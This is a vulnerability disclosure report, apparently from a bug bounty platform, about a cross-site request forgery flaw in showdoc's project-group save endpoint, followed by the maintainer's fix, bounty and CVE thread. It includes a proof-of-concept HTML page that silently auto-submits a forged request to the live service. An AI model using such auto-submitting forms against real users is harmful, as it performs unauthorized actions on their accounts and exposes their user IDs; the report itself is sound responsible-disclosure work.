Cross-Site Request Forgery (CSRF) in star7th/showdoc

Valid

Reported on

Nov 21st 2021


Description

An attacker is able to create a new group for any item if users visit the attacker's website. Furthermore, the user-id "uid" is also exposed via the JSON response.

We can bypass the CSRF Protection if we put our payload on an iframe or an HTML file and then send them to the victim.

Proof of Concept

Poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/itemGroup/save" method="POST">
      <input type="hidden" name="group_name" value="testcsrf" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="item_ids" value="1704644990568304" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Steps to Reproduce

1.Open the PoC.html in any browser.
2.Now you can check that a new group named testcsrf is created with the item that has id=1704644990568304 is added to that group.
Furthermore, the user id uid is also exposed via the JSON response:

{"error_code":0,"data":{"id":"2002","uid":"359287","group_name":"testcsrf","item_ids":"1704644990568304","s_number":"0","created_at":"2021-11-21 12:10:25","updated_at":"2021-11-21 12:10:25"}}

Video PoC

You can check my video PoC here: PoC

Impact

This can result in the exposure of data or unintended code execution.

We are processing your report and will contact the star7th/showdoc team within 24 hours. 13 days ago
Chau Minh Khanh modified their report
13 days ago
Chau Minh Khanh modified their report
13 days ago
We have contacted a member of the star7th/showdoc team and are waiting to hear back 12 days ago
star7th
12 days ago

Maintainer


There is already another report on this issue. Therefore, I have added the strict flag to the cookie. You can retest whether there are still problems you said.

Chau Minh Khanh
12 days ago

Researcher


Hi @star7th,

I can confirm that you added the strict flag in your fix as mentioned in another report. I retested and I saw that the CSRF vulnerability as I said with the reproduction steps above was no longer vulnerable.

However, you can see that my vulnerability was reported earlier and moreover, the CSRF vulnerability in my report exists in another endpoint, which is /api/itemGroup/save. It is related to Project Group management, not about Team management as in another report.

We have sent a follow up to the star7th/showdoc team. We will try again in 7 days. 9 days ago
star7th validated this vulnerability 9 days ago
Chau Minh Khanh has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th confirmed that a fix has been merged on 654e87 9 days ago
star7th has been awarded the fix bounty
Jamie Slome
3 days ago

Admin


CVE published! 🎊

Chau Minh Khanh
3 days ago

Researcher


Thank you for your support! @admin